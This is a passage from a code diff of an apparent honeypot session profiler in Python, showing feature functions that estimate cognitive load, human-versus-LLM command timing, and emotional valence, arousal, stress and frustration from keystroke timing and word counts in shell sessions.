Components missing data contribute 0.0 (no penalty for an absent
signal), and the composite normalises by *available* component
count so a session with zero inter-command pauses isn't punished
for the silence. Skip emission entirely when no commands at all
exist — there's no honest answer.
v0.1 thresholds; D.8 re-tunes once the rest of Phase D is stable.
"""
if not ctx.commands:
return
# Component A: chunking variance — median within-command CV
per_cmd_cvs: list[float] = []
for cmd_iats in ctx.intra_command_iats:
cv = _cv(cmd_iats)
if cv is not None:
per_cmd_cvs.append(cv)
if per_cmd_cvs:
chunking_load: float | None = _clip01(
statistics.median(per_cmd_cvs) / COGNITIVE_LOAD_CHUNKING_REF_CV
)
else:
chunking_load = None
# Component B: error rate
error_load: float = sum(1 for c in ctx.commands if c.errored) / len(ctx.commands)
error_load = _clip01(error_load)
# Component C: pace variability — CV of inter-command IATs
pace_cv = _cv(ctx.inter_cmd_iats)
if pace_cv is not None:
pace_load: float | None = _clip01(pace_cv / COGNITIVE_LOAD_PACE_REF_CV)
else:
pace_load = None
components = [c for c in (chunking_load, error_load, pace_load) if c is not None]
if not components:
return
load = sum(components) / len(components)
if load < COGNITIVE_LOAD_LOW_MAX:
value = "low"
elif load < COGNITIVE_LOAD_MEDIUM_MAX:
value = "medium"
else:
value = "high"
if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE:
confidence = 0.40
else:
# Composite over three soft sub-signals — held below the
# cap of single-source primitives. D.8 re-tunes.
confidence = 0.60
yield make_observation(
ctx,
primitive="cognitive.cognitive_load",
value=value,
confidence=confidence,
)
def inter_command_consistency(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``cognitive.inter_command_consistency``.
CV (stdev / mean) of inter-command IATs.
* ``metronomic`` (CV < 0.40) → LLM-pure. Empirical anchor:
LLM-simulated session CV ≈ 0.24 in this corpus.
* ``variable`` (0.40 ≤ CV < 1.50) → human. Empirical anchor:
human session CV ≈ 0.94.
* ``bimodal`` (CV ≥ 1.50) → LLM-assisted human, heuristic. v0.1
uses CV-only; true bimodal detection (Hartigan dip / two-peak)
is filed for v0.2 per the registry's ``notes:`` field.
"""
iats = ctx.inter_cmd_iats
if len(iats) < 2:
return
mean = statistics.fmean(iats)
if mean <= 0.0:
return
cv = statistics.stdev(iats) / mean
if cv < PAUSE_CV_METRONOMIC_MAX:
value = "metronomic"
elif cv >= PAUSE_CV_BIMODAL_MIN:
value = "bimodal"
else:
value = "variable"
confidence = (
0.40 if len(ctx.commands) < MIN_COMMANDS_FOR_FULL_CONFIDENCE else 0.75
)
yield make_observation(
ctx,
primitive="cognitive.inter_command_consistency",
value=value,
confidence=confidence,
)

View File

@@ -1,223 +0,0 @@
"""``emotional_valence.*`` feature functions (Phase G, soft block).
All four primitives in this module ride a hard 0.5 confidence cap
(:data:`EMOTIONAL_VALENCE_CONFIDENCE_CAP`). Cap is enforced inside
the feature functions, *not* via :func:`make_observation` — sample-size
honesty may still pull confidence below 0.5.
Step G.5: ``emotional_valence.valence``.
Step G.6: ``emotional_valence.arousal`` (lands later).
Step G.7: ``emotional_valence.stress_response`` (lands later).
Step G.8: ``emotional_valence.frustration_venting`` (lands later).
"""
from __future__ import annotations
import statistics
from typing import Iterator
from behave_core.spec.envelope import Observation
from decnet.profiler.behave_shell._ctx import SessionContext
from decnet.profiler.behave_shell._features._emit import make_observation
from decnet.profiler.behave_shell._thresholds import (
AROUSAL_BANG_RUN_MIN,
AROUSAL_CALM_IAT_S,
AROUSAL_CAPS_RUN_MIN,
AROUSAL_FAST_IAT_S,
AROUSAL_MIN_IATS,
EMOTIONAL_VALENCE_CONFIDENCE_CAP,
FRUST_VENT_FULL_CONFIDENCE_MIN,
FRUST_VENT_MIN_TYPED_CHARS,
STRESS_DISTRESS_RATIO_MIN,
STRESS_EUSTRESS_RATIO_MIN,
STRESS_MIN_ERRORED_WITH_IATS,
VALENCE_FULL_CONFIDENCE_MIN,
VALENCE_MIN_HITS,
VALENCE_MIN_TYPED_CHARS,
)
def _cap_soft(c: float) -> float:
"""Clamp confidence to the soft-primitive ceiling."""
return min(c, EMOTIONAL_VALENCE_CONFIDENCE_CAP)
def valence(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.valence`` ∈ {positive, neutral, negative}.
Pure ratio over the lexical counters built in G.0:
* ``positive`` — ``positive_lex_hits > negative_lex_hits +
obscenity_hits`` AND ``positive_lex_hits ≥ VALENCE_MIN_HITS`` (2).
* ``negative`` — ``negative_lex_hits + obscenity_hits >
positive_lex_hits`` AND that sum ≥ ``VALENCE_MIN_HITS``.
* ``neutral`` — fall-through.
Skip emission below ``VALENCE_MIN_TYPED_CHARS`` (80) typed letters.
Confidence hard-capped at 0.50 (registry convention); 0.30 below
``VALENCE_FULL_CONFIDENCE_MIN`` (200).
"""
if ctx.typed_letter_count < VALENCE_MIN_TYPED_CHARS:
return
pos = ctx.positive_lex_hits
neg_total = ctx.negative_lex_hits + ctx.obscenity_hits
if pos > neg_total and pos >= VALENCE_MIN_HITS:
value = "positive"
elif neg_total > pos and neg_total >= VALENCE_MIN_HITS:
value = "negative"
else:
value = "neutral"
raw = 0.50 if ctx.typed_letter_count >= VALENCE_FULL_CONFIDENCE_MIN else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.valence",
value=value,
confidence=_cap_soft(raw),
)
def arousal(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.arousal`` ∈ {low_calm, medium_engaged,
high_agitated}.
Three signals (any of which fires ``high_agitated``):
* ``ctx.caps_run_max ≥ AROUSAL_CAPS_RUN_MIN`` (5) — capslock rant.
* ``ctx.bang_run_max ≥ AROUSAL_BANG_RUN_MIN`` (3) — repeated bangs.
* The fastest typing burst's median IAT < ``AROUSAL_FAST_IAT_S``
(0.06) over a burst of ≥ ``AROUSAL_MIN_IATS`` (30) IATs.
``low_calm`` — slowest qualifying burst's median IAT >
``AROUSAL_CALM_IAT_S`` (0.30).
``medium_engaged`` — fall-through.
Skip emission when no qualifying typing bursts. Confidence hard-
capped at 0.50; 0.30 below ``AROUSAL_MIN_IATS`` total typed IATs.
"""
qualifying = [b for b in ctx.typing_bursts if len(b) >= 3]
if not qualifying:
return
fastest_med = min(statistics.median(b) for b in qualifying)
slowest_med = max(statistics.median(b) for b in qualifying)
total_iats = sum(len(b) for b in qualifying)
if (
ctx.caps_run_max >= AROUSAL_CAPS_RUN_MIN
or ctx.bang_run_max >= AROUSAL_BANG_RUN_MIN
or (
total_iats >= AROUSAL_MIN_IATS
and fastest_med < AROUSAL_FAST_IAT_S
)
):
value = "high_agitated"
elif total_iats >= AROUSAL_MIN_IATS and slowest_med > AROUSAL_CALM_IAT_S:
value = "low_calm"
else:
value = "medium_engaged"
raw = 0.50 if total_iats >= AROUSAL_MIN_IATS else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.arousal",
value=value,
confidence=_cap_soft(raw),
)
def stress_response(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.stress_response`` ∈ {none,
eustress_positive, distress_negative}.
Compare typing speed *after* an errored command vs the session
baseline:
* For each errored command at index ``i``, gather
``ctx.intra_command_iats[i+1]`` — the response command's intra-
command IATs.
* Baseline: median of all intra-command IATs from commands NOT
immediately following an errored command.
Verdict by ratio of post-error / baseline:
* ratio ≥ ``STRESS_EUSTRESS_RATIO_MIN`` (1.20) → ``eustress_positive``
(slowed down — recovered, deliberate).
* ratio ≤ ``1 / STRESS_DISTRESS_RATIO_MIN`` → ``distress_negative``
(sped up — anxious, mashing keys).
* otherwise → ``none``.
Skip emission when no commands. Confidence hard-capped at 0.50;
0.30 below ``STRESS_MIN_ERRORED_WITH_IATS`` (2) errored commands
with non-empty post-error IAT data.
"""
if not ctx.commands:
return
post_error_iats: list[float] = []
baseline_iats: list[float] = []
n = len(ctx.commands)
qualifying_errored = 0
for i, cmd in enumerate(ctx.commands):
is_post_error = i > 0 and ctx.commands[i - 1].errored
iats = list(ctx.intra_command_iats[i]) if i < len(ctx.intra_command_iats) else []
if is_post_error:
if iats:
qualifying_errored += 1
post_error_iats.extend(iats)
else:
baseline_iats.extend(iats)
# mypy: silence unused-var on n / cmd (kept for clarity)
_ = (n, cmd)
if not post_error_iats or not baseline_iats:
value = "none"
else:
med_post = statistics.median(post_error_iats)
med_base = statistics.median(baseline_iats)
if med_base <= 0.0:
value = "none"
else:
ratio = med_post / med_base
if ratio >= STRESS_EUSTRESS_RATIO_MIN:
value = "eustress_positive"
elif ratio <= 1.0 / STRESS_DISTRESS_RATIO_MIN:
value = "distress_negative"
else:
value = "none"
raw = 0.50 if qualifying_errored >= STRESS_MIN_ERRORED_WITH_IATS else 0.30
yield make_observation(
ctx,
primitive="emotional_valence.stress_response",
value=value,
confidence=_cap_soft(raw),
)
def frustration_venting(ctx: SessionContext) -> Iterator[Observation]:
"""Emit ``emotional_valence.frustration_venting`` ∈ {none, detected}.
Pure read of ``ctx.obscenity_hits`` (G.0 lexical counter):
* ``detected`` — ``obscenity_hits ≥ 1``.
* ``none`` — zero hits.
Skip emission below ``FRUST_VENT_MIN_TYPED_CHARS`` (30) typed
letters — too thin to call cleanly absent. Confidence hard-capped
at 0.50; 0.40 when ``detected``; 0.50 only when ``none`` AND
typed_letter_count ≥ ``FRUST_VENT_FULL_CONFIDENCE_MIN`` (200);
0.30 otherwise.
"""
if ctx.typed_letter_count < FRUST_VENT_MIN_TYPED_CHARS:
return
if ctx.obscenity_hits >= 1:
value = "detected"
raw = 0.40
else:
value = "none"
if ctx.typed_letter_count >= FRUST_VENT_FULL_CONFIDENCE_MIN:
raw = 0.50
else:
raw = 0.30
yield make_observation(
ctx,
primitive="emotional_valence.frustration_venting",
value=value,
confidence=_cap_soft(raw),
)

Some files were not shown because too many files have changed in this diff Show More